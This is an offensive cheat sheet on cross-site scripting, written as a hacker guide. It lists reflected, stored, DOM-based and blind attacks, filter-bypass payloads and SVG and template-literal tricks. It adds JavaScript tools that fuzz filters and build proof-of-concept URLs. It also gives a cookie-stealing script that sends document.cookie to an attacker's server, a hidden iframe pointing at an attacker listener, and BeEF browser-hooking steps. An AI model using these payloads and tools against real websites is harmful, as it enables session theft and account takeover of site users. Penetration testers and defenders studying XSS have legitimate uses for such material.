d4Rk's 1337 h4x0r guide

Cross site scripting (XSS)


Last updated 2 years ago

Cross-site scripting is a type of computer security vulnerability typically found in web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.

--

Types of XSS

Reflected (non-persistent)

Javascript code sent in a request, e.g. via query parameters or form data, is reflected in the response.

E.g.:

https://domain.com/?error=<script>alert(1)</script>

To exploit victims you need an external delivery mechanism, like email, a tweet or other message.

Stored (persistent)

Javascript code gets stored on the server and displayed in an unsafe way to other users.

Entry points:

  • URL query string

  • Message body

  • Request headers

  • Any out-of-band routes

Exit points:

  • All possible HTTP responses

-> Try to find links between entry and exit points.

E.g.: Use <script>alert(1)</script> as username, in a comment post, etc.

Via img (the onerror handler runs because the image fails to load):

<img src="." onerror="alert('test');" />

Via URL (a javascript: scheme in an href runs when the link is clicked):

<a href="javascript:alert('test')">test</a>

As your payload is stored on the server, you don't need an external delivery mechanism (as for reflected XSS); therefore stored XSS is generally considered the more severe vulnerability.

DOM-based (client-side code)

The attacker controls a source, i.e. a value the page reads from the URL or the browser (location.search, location.hash, document.referrer, postMessage data), that flows into a sink: a DOM write such as innerHTML or document.write(), or a JavaScript sink such as eval(). The server never sees the payload, so it cannot be found by looking at responses alone.

HTML sinks

Place a random alphanumeric string into the source (e.g. location.search) and inspect the rendered DOM with the browser's developer tools to see where it lands and in which context (text node, attribute value, script block); the context decides which payload can work.

JS sinks

Using the browser's developer tools (search the loaded scripts for the source, set breakpoints), follow your input through the JavaScript code and check whether and how it reaches a sink.
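The canary method from the two paragraphs above, as an added example that is not part of the guide: a small Node script that finds every place a canary string lands in a response body (or in a DOM dump copied from the developer tools via document.documentElement.outerHTML), reports the markup context, and suggests a probe for that context. The context detection is a heuristic over raw markup rather than a real HTML/JS parser, and the sample HTML is constructed for the demo.

```javascript
// Added example (not from the original guide): classify where a canary
// string lands in a page so the right XSS payload for that context can be
// chosen. Run it over an HTTP response body or over the live DOM copied
// from the browser's developer tools. Context detection is a heuristic over
// the raw markup, not a full parser.

// Which quote (if any) is still open at the end of a JavaScript snippet.
// Ignores comments and regex literals; good enough for a first probe.
function openJsQuote(js) {
  let quote = null;
  for (let i = 0; i < js.length; i++) {
    const c = js[i];
    if (c === '\\') { i++; continue; }           // skip escaped character
    if (quote === null && (c === '"' || c === "'" || c === '`')) quote = c;
    else if (c === quote) quote = null;
  }
  return quote || '';
}

// Describe the markup context at a given offset in the document.
function contextAt(html, pos) {
  const before = html.slice(0, pos);
  const lower = before.toLowerCase();
  const scriptOpen = lower.lastIndexOf('<script');
  const scriptClose = lower.lastIndexOf('</script');
  if (scriptOpen > scriptClose) {               // inside an unclosed <script>
    const body = before.slice(lower.indexOf('>', scriptOpen) + 1);
    return { context: 'script', quote: openJsQuote(body) };
  }
  const lt = before.lastIndexOf('<');
  const gt = before.lastIndexOf('>');
  if (lt > gt) {                                // inside a tag
    const m = before.slice(lt).match(/\s([\w-]+)\s*=\s*(["']?)[^"']*$/);
    if (m) return { context: 'attribute', name: m[1], quote: m[2] };
    return { context: 'tag' };
  }
  return { context: 'text' };
}

// Every place the canary is reflected, with its context.
function reflectionContexts(html, canary) {
  const found = [];
  let idx = html.indexOf(canary);
  while (idx !== -1) {
    found.push({ offset: idx, ...contextAt(html, idx) });
    idx = html.indexOf(canary, idx + canary.length);
  }
  return found;
}

// A probe matching the context (the same shapes the guide lists).
function suggestPayload(ctx) {
  switch (ctx.context) {
    case 'text':      return '<img src=x onerror=alert(1)>';
    case 'attribute': return `${ctx.quote} autofocus onfocus=alert(1) x=${ctx.quote}`;
    case 'tag':       return ' autofocus onfocus=alert(1) x=';
    case 'script':
      if (ctx.quote === '`') return '${alert(1)}';
      return ctx.quote ? `${ctx.quote}-alert(1)-${ctx.quote}` : ';alert(1)//';
  }
  return null;
}

// Constructed sample response: the canary reflected three different ways.
const CANARY = 'qz7x9kv2';
const SAMPLE_HTML = [
  '<html><body>',
  `<h1>Results for ${CANARY}</h1>`,
  `<input type="text" name="q" value="${CANARY}">`,
  `<script>var q = '${CANARY}'; track(q);</script>`,
  '</body></html>',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  for (const ctx of reflectionContexts(SAMPLE_HTML, CANARY)) {
    console.log(ctx, '->', suggestPayload(ctx));
  }
}
```

Run it with node to see the three contexts (text, a double-quoted value attribute, a single-quoted JS string) and the probe each one calls for; replace SAMPLE_HTML with a saved response or DOM dump for real use.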

jQuery

Sinks:

  • attr(): e.g. attr('href', location.hash) makes a javascript: URL clickable

  • $(): older jQuery versions (before 1.9) treated any selector string containing < as HTML, so $(location.hash) created attacker-controlled elements

AngularJS

Check for an ng-app attribute. Inside it, {{...}} in user-controlled content is evaluated as an AngularJS expression, which gives JavaScript execution; AngularJS 1.x before 1.6 has an expression sandbox that needs an escape, later versions have no sandbox.

Blind

Similar to "Stored", but you never see the page where the payload executes (an admin panel, a support ticket queue, a log viewer), so use a payload that calls back to a server you control (e.g. XSS Hunter, see references) and reports where it fired. E.g.:

  • Submitting a contact form containing XSS

Bypass WAF

Tags and events

Filters usually block a list of known tags and event handlers rather than everything. Use "Copy tags to clipboard" and "Copy events to clipboard" from the PortSwigger XSS cheat sheet (see references) and fuzz both lists against the target (e.g. using Burp Intruder) to find the tags and events that are not filtered.

Custom tag

Trigger XSS using a custom (non-existent) HTML tag, which most filters ignore. tabindex lets the element receive focus, and appending #blub (the element's id) to the URL makes the browser focus it on load, so onfocus fires without user interaction.

<bla id=blub onfocus=alert(1) tabindex=1>#blub
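The tag/event fuzzing described above, as an added example that is not part of the guide: a Node script that builds probes in the guide's custom-tag shape for every tag/event pair, reports which pairs are reflected intact, and turns a survivor into a proof-of-concept URL with the #fragment that focuses the element. The filter is a constructed stand-in for a WAF and mockSend stands in for an HTTP request; swap in a real sender for the target.

```javascript
// Added example (not from the original guide): brute-force which tag/event
// combinations survive a filter, the way Burp Intruder is used with the tag
// and event lists from the PortSwigger cheat sheet. mockWaf and mockSend are
// constructed stand-ins; 'send' would normally issue an HTTP request and
// return the response body.

// Probe in the guide's custom-tag shape; the id lets a #fragment in the URL
// focus the element so onfocus fires without user interaction.
function buildProbe(tag, event, id = 'x') {
  return `<${tag} id=${id} ${event}=alert(1) tabindex=1>`;
}

// Stand-in filter: strips script/img tags and onerror/onload handlers.
function mockWaf(body) {
  return body
    .replace(/<(script|img)\b[^>]*>/gi, '')
    .replace(/\bon(error|load)\s*=/gi, '');
}

// The target reflects the parameter into the page after filtering.
function mockSend(payload) {
  return `<html><body><p>You searched for: ${mockWaf(payload)}</p></body></html>`;
}

// Try every tag/event pair; a pair survives if the probe is reflected intact.
function findUnfiltered(tags, events, send = mockSend) {
  const survivors = [];
  for (const tag of tags) {
    for (const event of events) {
      const probe = buildProbe(tag, event);
      if (send(probe).includes(probe)) survivors.push({ tag, event });
    }
  }
  return survivors;
}

// Turn a surviving probe into a proof-of-concept URL; the fragment matches
// the id in the probe so the browser focuses it on load.
function pocUrl(base, param, probe, id = 'x') {
  return `${base}?${param}=${encodeURIComponent(probe)}#${id}`;
}

// Constructed short lists; use the full cheat-sheet lists in practice.
const TAGS = ['script', 'img', 'svg', 'bla'];
const EVENTS = ['onerror', 'onload', 'onfocus'];

if (typeof require !== 'undefined' && require.main === module) {
  for (const { tag, event } of findUnfiltered(TAGS, EVENTS)) {
    console.log(tag, event, pocUrl('https://target.example/search', 'q', buildProbe(tag, event)));
  }
}
```

Against the stand-in filter only the onfocus pairs on unblocked tags survive; real filters also normalise case and encoding, so fuzz the reflected form, not just the request.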

SVG tag

Using animation and onbegin event:

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><rect><animateTransform onbegin="alert(1)" /></rect></svg>

Using svg animate tag to set the href attribute for anchor tag:

<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me!</text></a></svg>

Break out JS string

E.g. using:

'-alert(1)-'
';alert(1)//'

HTML encoding

Inside an attribute value such as onclick the HTML parser decodes character references before the JavaScript engine sees the code, so an encoded single quote breaks out of a JS string even when a raw ' is blocked. This only works in attribute context; entities inside a <script> block are not decoded.

&apos;
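The entity-decoding step described above, as an added example that is not part of the guide: a minimal decoder for the references an attribute value goes through before reaching the script engine, applied to an onclick handler that blocks a raw quote but not &apos;, &#39; or &#x27;, with the decoded handler executed under Node against a stub alert(). renderOnclick and showMessage are invented for the demo.

```javascript
// Added example (not from the original guide): what the JavaScript engine
// actually sees in an event-handler attribute after the HTML parser has
// decoded character references. Minimal decoder: named entities limited to
// the common five, plus decimal and hex numeric references.

const NAMED = { apos: "'", quot: '"', amp: '&', lt: '<', gt: '>' };

// Decode &name;, &#NNN; and &#xHH; the way an attribute value is decoded
// before its text reaches the script engine.
function decodeAttributeValue(value) {
  return value.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (whole, body) => {
    if (body[0] === '#') {
      const hex = body[1] === 'x' || body[1] === 'X';
      const cp = parseInt(body.slice(hex ? 2 : 1), hex ? 16 : 10);
      return String.fromCodePoint(cp);
    }
    return Object.prototype.hasOwnProperty.call(NAMED, body) ? NAMED[body] : whole;
  });
}

// Execute a decoded onclick body with a stub alert and a stub target
// function so the effect of the payload can be observed outside a browser.
function runHandler(handlerSource) {
  const alerts = [];
  const fn = new Function('alert', 'showMessage', handlerSource);
  fn((x) => alerts.push(x), () => {});
  return alerts;
}

// Hypothetical application: user input lands inside showMessage('...') in
// an onclick attribute; a raw single quote is rejected, entities are not.
function renderOnclick(userInput) {
  if (userInput.includes("'")) throw new Error('blocked: raw quote');
  return `showMessage('${userInput}')`;     // attribute value as served
}

// Constructed attacker inputs, none of which contains a raw quote.
const PAYLOADS = [
  '&apos;-alert(1)-&apos;',
  '&#39;-alert(1)-&#39;',
  '&#x27;-alert(1)-&#x27;',
];

// For each payload: the handler after decoding, and whether alert fired.
function demonstrate() {
  return PAYLOADS.map((p) => {
    const decoded = decodeAttributeValue(renderOnclick(p));
    return { payload: p, decoded, alerts: runHandler(decoded) };
  });
}
```

All three payloads decode to showMessage(''-alert(1)-'') and fire alert(1); a filter that only checks for the literal quote character never sees one.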

Template literals

Template literals are enclosed in backticks, and ${...} inside them evaluates arbitrary JavaScript, so no quote needs to be broken out of.

document.getElementById('message').innerText = `user controllable data`; // inject e.g. ${alert(1)}
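The "Break out JS string" and "Template literals" cases above, as an added example that is not part of the guide: a Node script with three hypothetical server-side renderers that embed user input into inline JavaScript (single-quoted string, the same with a quote-only backslash fix, and a template literal), a hardened renderer, and a runner that executes the generated script against a stub alert() so the outcome is observable. The backslash-escape bypass goes one step beyond the guide's two payloads; all names are invented for the demo.

```javascript
// Added example (not from the original guide): how user input embedded in
// inline JavaScript executes under three unsafe renderers and one safe one.
// 'show' stands in for whatever the page does with the value.

// Run generated inline script with stub alert/show and report what happened.
function runInline(js) {
  const alerts = [];
  const shown = [];
  new Function('alert', 'show', js)((x) => alerts.push(x), (v) => shown.push(v));
  return { alerts, shown };
}

// 1. Input dropped into a single-quoted string with no encoding at all.
function renderSingleQuoted(input) {
  return `var msg = '${input}'; show(msg);`;
}

// 2. Partial fix that backslash-escapes quotes but not the backslash itself.
function renderBackslashEscaped(input) {
  const escaped = input.replace(/'/g, "\\'");
  return `var msg = '${escaped}'; show(msg);`;
}

// 3. Input dropped into a template literal.
function renderTemplateLiteral(input) {
  return 'var msg = `' + input + '`; show(msg);';
}

// Hardened: emit a JSON string literal and additionally escape '<' (so the
// value can never close the <script> block) and the two line terminators
// JSON.stringify leaves raw, which older engines treat as newlines.
function renderSafe(input) {
  const literal = JSON.stringify(input)
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  return `var msg = ${literal}; show(msg);`;
}

// Constructed payloads: the guide's two break-outs, the backslash bypass
// (a leading backslash neutralises the escaping backslash), and the
// template-literal expression.
const PAYLOADS = {
  breakOut: "'-alert(1)-'",
  breakOutComment: "';alert(1)//",
  backslashBypass: "\\';alert(1)//",
  templateLiteral: '${alert(1)}',
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, p] of Object.entries(PAYLOADS)) {
    console.log(name, 'unsafe:', runInline(renderSingleQuoted(p)).alerts,
      'safe:', runInline(renderSafe(p)));
  }
}
```

The renderer that escapes only quotes stops '-alert(1)-' but not \';alert(1)//, because the injected backslash escapes the one the filter adds; JSON.stringify handles both characters and is the form to use.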

Polyglots

A polyglot is a single payload built to execute in several contexts at once (HTML text, attribute value, JavaScript string, comment), so one probe covers many injection points when the context is unknown. See the Xss JaVaSCRipt PoLYglOTs link in the references.
Iframe injection

A zero-size iframe silently loads a page of your choosing (e.g. a listener that logs the request, or a page that hooks the browser into BeEF) inside the victim's browser:

<iframe src="http://10.11.0.5/report" height="0" width="0"></iframe>

Stealing cookies & sessions

Make the victim's browser request an image from your server with the cookie in the query string. Cookies flagged HttpOnly are not visible to document.cookie; for those, use the session from inside the victim's browser instead (e.g. via BeEF or fetch() requests to the target).

<script>
new Image().src="https://<your-server>/?cookie="+encodeURIComponent(document.cookie);
</script> 

BeEF

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser: once a victim's browser loads the hook script (hook.js, e.g. via an XSS payload or the iframe above), it can be controlled from the BeEF web UI.

Start it with ./beef; the default credentials are beef / beef.

  • Wikipedia: Cross-site scripting
  • OWASP: XSS Filter Evasion Cheat Sheet
  • GitHub: swisskyrepo/PayloadsAllTheThings, XSS Injection
  • GitHub: mandatoryprogrammer/xsshunter (portable version of the XSS Hunter service)
  • PortSwigger Cheat Sheet
  • XSSMap
  • PortSwigger Web Security Academy: Which sinks can lead to DOM-XSS vulnerabilities?
  • PortSwigger: XSS Cheat Sheet
  • Xss JaVaSCRipt PoLYglOTs
  • BeEF: The Browser Exploitation Framework Project